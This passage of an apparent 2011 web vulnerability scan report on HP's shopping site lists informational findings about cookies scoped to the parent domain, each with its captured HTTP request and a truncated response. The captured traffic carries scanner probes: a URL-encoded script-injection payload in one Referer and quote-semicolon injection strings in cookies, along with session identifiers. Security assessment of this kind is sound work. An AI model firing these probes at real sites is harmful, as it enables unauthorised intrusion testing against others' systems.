ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=19; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS_HP_CLICKS=4x17x11042; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fmpss_portal.do_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CArticle%25257CHP%252520CoolSense%252520Technology%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fcache%25252F596786-0-0-225-121.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 140544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<style type="text/css">
.NewMpss{float
...[SNIP]...

3.14. http://www.shopping.hp.com/webapp/shopping/product_advisor.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_advisor.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=24; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11190; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fseries_can.do%25253FstoreName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-One%25252BPCs%252526jumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252FAll-in-One_PCs%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fproduct_advisor.do%25253Flanding%25253Ddesktops%252526storeName%25253Dcomputer_st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 166238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html lang="en">
<head>
<style ty
...[SNIP]...

3.15. http://www.shopping.hp.com/webapp/shopping/product_comparison.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...

3.16. http://www.shopping.hp.com/webapp/shopping/product_detail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:08:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:08:16 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 227618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

3.17. http://www.shopping.hp.com/webapp/shopping/search_request.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/search_request.do;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?searchType=keyword&inkTonerSearchQuery=&pageName=home&Printer_Search_Query=&Cartridge_Search_Query=&printerOrCartridgeSearch=&locationOfSearchQuery=&returnUrlQueryString=&searchQuery=xss+printer HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlkviNuV2Qh%2FMS3uvFPdcQKd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=6; s_var_20=in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Aprinters%20%26%20all-in-ones; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x5x34; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksi9Ge2gh4NinvvVvZdgWa0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcomsh_usen=s1=xss+printer&s1_context=hhostore&s2_context=hpcomsearch&s2=xss; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27xss+printer%27%2C%27search_referrer%27%3A%27home%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1867


<html>
<body>

<!-- SiteCatalyst code version: F.3.
Copyright 2006 Omniture, Inc. More info available at
http://www.omniture.com Testing -->
<s
...[SNIP]...

3.18. http://www.shopping.hp.com/webapp/shopping/series_can.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


